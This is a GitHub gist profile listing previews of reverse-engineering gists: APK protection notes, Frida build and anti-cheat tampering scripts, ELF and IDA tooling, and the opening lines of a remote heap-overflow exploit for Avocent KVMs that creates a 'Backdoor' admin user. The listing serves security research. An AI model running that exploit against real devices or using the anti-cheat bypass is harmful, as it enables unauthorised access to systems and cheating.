Skip to content

Instantly share code, notes, and snippets.

View apkunpacker's full-sized avatar

ApkUnpacker apkunpacker

411 followers · 46 following
View GitHub Profile
@apkunpacker
apkunpacker / zshield_notes.md
Created August 10, 2024 06:40 — forked from DavidBuchanan314/zshield_notes.md

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain, somebody told me it is but I haven't really seen any identifying marks in the code yet)

Interesting assets within the APK:

lib/arm64-v8a/liboptipkawfn.so    ~3MB packed/encrypted ELF
assets/optipkawfn/0.odex          only 41 bytes (EDIT: I think this is part of an asset obfuscation scheme, the real file contents are likely elsewhere - inside the .szip maybe?)
assets/optipkawfn.szip ~8MB - I predict containing encrypted+compressed bytecode
@apkunpacker
apkunpacker / guide.md
Created July 26, 2024 15:00 — forked from miticollo/guide.md
How to build Frida (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootfull and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

@apkunpacker
apkunpacker / index.ts
Created July 14, 2024 13:54 — forked from commonuserlol/index.ts
ACTk ObscuredTypes hax with frida; tested on 2.0.2
import "frida-il2cpp-bridge";
function main() {
const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
// Note that on versions older than 2.x.y this isn't needed
// Since ACTk bundled directly into Assembly-CSharp
const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;
// Target class
const PlayerData = AssemblyCSharp.class("PlayerData");
@apkunpacker
apkunpacker / elf_format_cheatsheet.md
Created March 13, 2024 15:25 — forked from x0nu11byt3/elf_format_cheatsheet.md
ELF Format Cheatsheet

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@apkunpacker
apkunpacker / asmpwn.py
Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # this is hardcoded in the binary
print(f"[*] Exploiting ASMP on {hostname} port {port}")
@apkunpacker
apkunpacker / load_wrapper.cc
Created November 22, 2023 02:12 — forked from singleghost2/load_wrapper.cc
Disable ASLR on macOS for dylib include those loaded with `dlopen`
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <string.h>
/* ASLR disabling magic constant from Apple LLDB source code
https://opensource.apple.com/source/lldb/lldb-76/tools/darwin-debug/darwin-debug.cpp
*/
@apkunpacker
apkunpacker / outline_graph.py
Created October 25, 2023 10:02 — forked from NyaMisty/outline_graph.py
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@apkunpacker
apkunpacker / CorePatchDetector.kt
Created August 3, 2023 16:11 — forked from 5ec1cff/CorePatchDetector.kt
CorePatch detector
package io.github.a13e300.demo.maho
import android.app.PendingIntent
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.content.pm.PackageInstaller
import android.content.pm.PackageInstaller.EXTRA_STATUS
import android.content.pm.PackageInstaller.STATUS_PENDING_USER_ACTION
@apkunpacker
apkunpacker / example.txt
Created July 14, 2023 03:58 — forked from jevinskie/example.txt
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@apkunpacker
apkunpacker / add_debug_entitlement.sh
Created May 24, 2023 14:58 — forked from talaviram/add_debug_entitlement.sh
Simple Utility Script for allowing debug of hardened macOS apps.
#! /bin/bash
# Simple Utility Script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developer that would like keep developing without turning SIP off.
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
# Update 2022-03-10: Based on Fabian's feedback, add capability to inject DYLD for sanitizers.
#
# Please note:
# - Modern Logic (on M1s) uses `AUHostingService` which resides within the system thus not patchable and REQUIRES to turn-off SIP.
# - Some hosts uses separate plug-in scanning or sandboxing.
# if that's the case, it's required to patch those (if needed) and attach debugger to them instead.